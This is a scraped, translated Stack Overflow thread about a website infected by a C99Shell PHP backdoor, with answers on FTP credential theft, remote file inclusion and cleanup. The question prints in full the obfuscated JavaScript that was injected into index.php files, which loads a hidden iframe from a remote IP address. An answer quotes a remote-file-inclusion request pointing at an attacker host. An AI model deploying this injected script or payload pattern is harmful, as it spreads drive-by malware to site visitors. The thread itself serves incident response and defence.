- android - RelativeLayout 背景可绘制重叠内容
- android - 如何链接 cpufeatures lib 以获取 native android 库?
- java - OnItemClickListener 不起作用,但 OnLongItemClickListener 在自定义 ListView 中起作用
- java - Android 文件转字符串
我的网站被木马脚本感染了。
有人设法创建/上传了一个名为“x76x09.php”或“config.php”的文件到我的网站空间的根目录中。它的大小是 44287 字节,它的 MD5 校验和是 8dd76fc074b717fccfa30b86956992f8。 I've analyzed this file using Virustotal .这些结果表明它是“Backdoor/PHP.C99Shell”或“Trojan.Script.224490”。
这个文件在创建的那一刻就被执行了。所以它一定是自动发生的。该文件将以下恶意代码添加到我网站空间中每个 index.php 的末尾。
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
在我的页面上显示该代码后,用户报告说在 Firefox 中弹出了一个蓝色面板。它要求他们安装一个插件。现在他们中的一些人的 PC 上有 Exploit.Java.CVE-2010-0886.a。
尽管我关闭了 allow_url_fopen 和 allow_url_include,但还是发生了感染。我的托管商说文件不是通过 FTP 上传的。
所以我的问题是:
非常感谢您!我真的需要帮助。
最佳答案
我们看到的许多遭到黑客攻击的网站都是由用于将文件通过 FTP 传输到受感染网站的 PC 上的病毒造成的。该病毒以多种方式窃取 FTP 密码 - 但主要有两种。
首先,如果您使用的是 FileZilla 这样的免费 FTP 程序,您应该知道这些程序将其保存的登录凭据存储在纯文本文件中。病毒很容易找到这些文件,读取它们并将信息发送到服务器,然后服务器使用有效凭据登录 FTP,将某些文件复制到自身,感染它们,然后将它们发送回网站。通常它还会将这些“后门”shell 脚本复制到网站,以便在更改 FTP 密码时,它们仍然可以重新感染网站。
该病毒还会“嗅探”FTP 流量。由于 FTP 以明文形式传输包括用户名和密码在内的所有数据,因此病毒也很容易以这种方式查看和窃取信息。
然而,当我们看到导致感染的后门时,通常是网站某处的远程文件包含漏洞造成的。黑客不断尝试在任何请求字符串的末尾添加指向其后门程序之一的 URL。因此,在您的访问日志中,您可能会看到如下内容:
/路径/文件夹/另一个/文件夹/file.php? http://www.hackerswebsite.com/id.txt ????
此处路径/文件夹字符串仅用于演示目的。
有时该命令有效,他们能够将 id.txt 复制到预期的网站,从而拥有一个后门 shell 脚本,他们可以从中操纵文件。
更改所有密码 - FTP、数据库、cPanel 或其他管理界面。
对所有 PC 进行病毒扫描。
更改为 SFTP。
检查所有文件夹的 755 权限和所有文件的 644。这是标准的。
如果是 SQL 注入(inject),感染就不会出现在文件末尾。它会在某个地方有一个 SQL 调用来生成内容。
是的。使用今天的后门,攻击者可以并且可能已经查看了保存 MySQL 数据的 config.php 文件。
更改所有密码。
关于php - 保护网站免受 Backdoor/PHP.C99Shell aka Trojan.Script.224490 的侵害,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/3410274/
我的网站有这个“JS:Redirector-NL [Trj]”病毒问题 http://nutriconsulting.com.br/ ,当有人打开网页时,avast 防病毒软件会显示一个弹出窗口,显示
我在我的项目中使用实现'android.arch.lifecycle:extensions:1.1.1'。 当我构建发布或调试 apk 并从 apk 中打开 AndroidManifest.xml 时
我的网站被木马脚本感染了。 有人设法创建/上传了一个名为“x76x09.php”或“config.php”的文件到我的网站空间的根目录中。它的大小是 44287 字节,它的 MD5 校验和是 8dd7
从今天开始,当我们使用最新版本的 Android Studio 构建应用程序并启用即时运行时,卡巴斯基开始向我们报告有人试图在我们的 classes.dex 中注入(inject) HEUR:Troj
我是一名优秀的程序员,十分优秀!